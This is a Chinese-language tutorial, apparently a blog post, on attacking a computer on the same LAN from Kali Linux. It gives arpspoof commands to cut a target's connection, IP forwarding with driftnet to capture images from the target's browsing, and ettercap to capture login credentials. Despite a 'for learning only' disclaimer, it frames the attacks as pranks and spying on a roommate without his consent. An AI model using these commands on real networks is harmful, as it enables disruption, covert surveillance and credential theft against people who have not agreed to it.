配置所需:
1、攻击机:Kali Linux(IP:192.168.1.100)
2、目标靶机:Windows7
3、同一局域网
攻击项目:
1、使目标靶机进行断网
2、获取目标靶机游览网页时的图片
3、获取目标靶机对网页输入的账号及密码
前言:
在只知道处于同一局域网的情况下,对局域网内的电脑进行渗透攻击测试,仅提供学习参考
一、ARP断网攻击
舍友大半夜不睡觉,电脑敲得噼里啪啦的,为了让他补充好睡眠,决定给他断个网
1、首先确定靶机的IP地址
nbtscan IP/24 //扫描局域网内的主机
通过上面命令进行扫描得到局域网主机信息
2、ARP攻击
先测试目标靶机是否能够正常上网,测试后发现目前是可以正常上网的
接下来进行ARP攻击,发现机器已经不能够正常上网
arpspoof -i 网卡名称 -t 靶机IP 网关
目标靶机此时是不能够正常上网的,CTRL+Z结束上面命令即可正常上网
此时他的电脑以及心情...
二、driftnet获取图片
舍友晚上躲在被窝偷偷学习,却不给你看,这个时候就可以用到driftnet来获取他所预览网页的图片
1、开启流量转发
echo 1 >/proc/sys/net/ipv4/ip_forward
vim /etc/sysctl.conf
输入vim /etc/sysctl.conf将28行代码(下图),取消注释
开启流量转发后,目标机器就能够正常上网,我们也可以获取他所预览的图片
2、进行攻击
下面的操作需要开启两个终端,输入以下命令如下图
arpspoof -i 网卡名称 -t 网关 目标IP
driftnet -i 网卡名称 -a -d 保存的目录
输入命令后,只需要等待他游览网页,就会自动将图片保存至我们指定的目录
待driftnet有动静后,此时我们可以去我们所保存的目录进行查看
三、ettercap
ettercap可以获取别人在网页中所输入的账户密码
ettercap -Tq -i 网卡名称
arpspoof -i 网卡名称 -t 网关 IP
此时只需要等待目标在网页中输入账户密码
在点击登录后,kali就有反应了
可以看到密码是被加密了,不过还是成功获取到了
从入门到入狱:
一、Kali Linux配置IP地址